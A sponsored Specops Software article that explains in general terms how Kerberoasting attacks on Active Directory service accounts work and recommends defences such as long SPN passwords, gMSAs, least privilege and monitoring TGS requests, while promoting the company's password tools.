How to harden your Active Directory against Kerberoasting

Kerberoasting is a common attack targeting Microsoft Active Directory, enabling attackers to compromise service accounts with low risk of detection. Because it manipulates legitimate accounts, it can be highly effective. However, robust password security can keep the criminals at bay.

First, what is Kerberoasting? The name comes from ‘Kerberos’, the authentication protocol used in Active Directory, which verifies a user’s identity or that of a computer requesting access to resources.

Kerberoasting is a privilege escalation attack where a perpetrator in control of a standard Windows user account attempts to crack the password for an account with a Service Principle Name (SPN); if successful, they can then escalate their attacks to threaten any part of the architecture connected to the targeted account.

Multi-pronged attack

How does an attack work in practice? It’s slightly complex, but there are five key stages:

1. The attacker begins by exploiting an existing Windows user account in Active Directory. They may have gained access to this account using any of the traditional, nefarious methods, such as stealing credentials via phishing or malware.

2. They then identify an account on the active directory with an SPN attached, using tools such as GhostPack’s Rubeus. These service accounts are dangerous because they often have high-level permissions or domain administrator access.

3. Using the account they control, the attacker requests a service ticket from the ticket granting service (TGS) in Active Directory. This ticket contains the SPN in focus and is encrypted with the hash of the target account’s password.

4. The attacker takes the ticket offline, concealing their activities: there is no longer any unusual network traffic that might give them away. 

5. Finally, the perpetrator uses brute force techniques to attempt to crack the SPN password hash, enabling them to recover plaintext service-account passwords. They can then access anything that account can access.  

Adversary advantages

Kerberoasting is a complex process, with a range of tools available online to both detect accounts with an associated SPN and to then break into the ticket. However, it has significant advantages for attackers:

• They can exploit any user account to request a ticket from the AD. One account is just as dangerous as another.

• Because they attempt to crack the password hash offline, they can essentially keep trying to crack the password hash without detection. Tools like John the Ripper or Hashcat can be deployed.

• Kerberoasting doesn’t rely on malware, meaning traditional solutions like antivirus software aren’t effective.

How to protect your Active Directory

It’s easy to see why Kerberoasting would appeal to cybercriminals. However, organizations can take steps to protect their AD from the danger.

• Enforce robust SPN passwords: Each SPN-enabled account should be protected by long, random, non-reusable passwords. If it’s 25 characters or more, the chances of a successful Kerberoasting attack are hugely diminished.

• Reduce SPN footprint: It’s wise to audit your existing SPN-enabled accounts, consolidating duplicate accounts or disabling them altogether. The goal is to minimize the number of individual SPN credentials that you need to protect. Group Managed Service Accounts (gMSAs) can also be useful, automating password management for additional security.

• Control privileges: Restrict service accounts to only the permissions they require, ensuring they aren’t members of high-privilege groups. Tiered administration models can also ensure that compromised SPNs can’t be escalated to domain-wide privileges.

• Monitor Kerberos traffic for anomalies: Keep an eye out for early-stage Kerberoasting reconnaissance efforts. For instance, security information and event management (SIEM) solutions can be configured to detect unusual patterns, such as spikes in TGS requests for a single SPN.

Scan your AD for stale accounts

Specops Password Auditor is a read-only tool that lets proactively scan for weak, reused, and breached passwords in your Active Directory environment. It help audit service accounts in the domain for password security and help give visibility to service accounts with administrator permissions.

Your exportable report gives you a full view of stale accounts in your organizations, which are often a starting point for Kerberoasting attacks. Download your free tool here.

Prevent Kerberoasting attacks

Kerberoasting is a complex form of attack, built across different stages. However, one thing is certain: password security sits at the heart of your defense.

This works on two major levels.

First, before attackers can request a service ticket tied to an SPN account, they need to have access to another user account that they can manipulate. They target this through well-known means, such as phishing or malware.

Multi-factor authentication (MFA) is also key to protecting accounts against this danger, with passwords a key component.

By ensuring your passwords meet the most stringent security demands, you can protect your organization – and its employees – from the first stage of a Kerberoasting attack.

Second, there’s the attack itself. As we’ve seen, Kerberoasting and brute force tactics struggle against lengthy, unique passwords of 25 characters or more. By ensuring all your SPN-linked accounts are protected by such passwords, you take a huge step towards securing your Active Directory.

Specops Password Policy makes it easy to block weak passwords and enforce the creation of strong, unique passphrases. On top if that, it continuously scans your AD against a growing list of over 4 billion compromised passwords, alerting end users if their password is found to be breached.

Interested to know how this could work in your environment? Get in touch for a demo.

Sponsored and written by Specops Software.